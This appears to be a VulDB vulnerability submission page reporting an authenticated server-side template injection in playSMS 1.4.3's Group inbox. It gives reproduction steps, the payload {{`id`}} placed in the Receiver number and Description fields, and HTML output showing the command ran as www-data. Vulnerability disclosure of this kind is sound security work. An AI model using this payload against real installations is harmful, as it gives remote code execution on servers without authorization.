提出 #363733: playSMS 1.4.3 Server Side Template Injection (SSTI)情報

タイトル	playSMS 1.4.3 Server Side Template Injection (SSTI)
説明	PlaySMS 1.4.3 has authenticated Server Side Template Injection in Group inbox. The manipulation of the argument "Receiver number" and "Description", that leads to a Authenticated RCE 1. Authenticate in login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login 2. Features > Group inbox (/index.php?app=main&inc=feature_inboxgroup&op=list) 3. Click in Plus (+) icon to add new group 4. Add payload {{`id`}} in "Receiver number" and "Description field 5. Save and back to Features > Group inbox Also we can click in action edit to view Description RCE <tr><td class=label-sizer>Receiver number</td><td>uid=33(www-data) gid=33(www-data) groups=33(www-data) </td></tr> <tr><td>Keywords</td><td><input type='text' name='keywords' value='' maxlength='100'><i class='glyphicon glyphicon-info-sign playsms-tooltip' data-toggle=tooltip title='Separate with comma for multiple items' rel=tooltip></i></td></tr> <tr><td>Description</td><td><input type='text' name='description' value='uid=33(www-data) gid=33(www-data) groups=33(www-data) ' maxlength='100'></td>
ソース	⚠️ https://github.com/playsms/playsms/tree/master/storage/application/plugin/feature/inboxgroup
ユーザー	Dhimitri (UID 45045)
送信	2024年06月25日 01:15 (2 年 ago)
モデレーション	2024年07月03日 07:29 (8 days later)
ステータス	承諾済み
VulDBエントリ	270278 [playSMS 1.4.3 Template index.php?app=main&inc=feature_inboxgroup&op=list Receiver Number 特権昇格]
ポイント	20

◂ 前概要次 ▸

Might our Artificial Intelligence support you?

Check our Alexa App!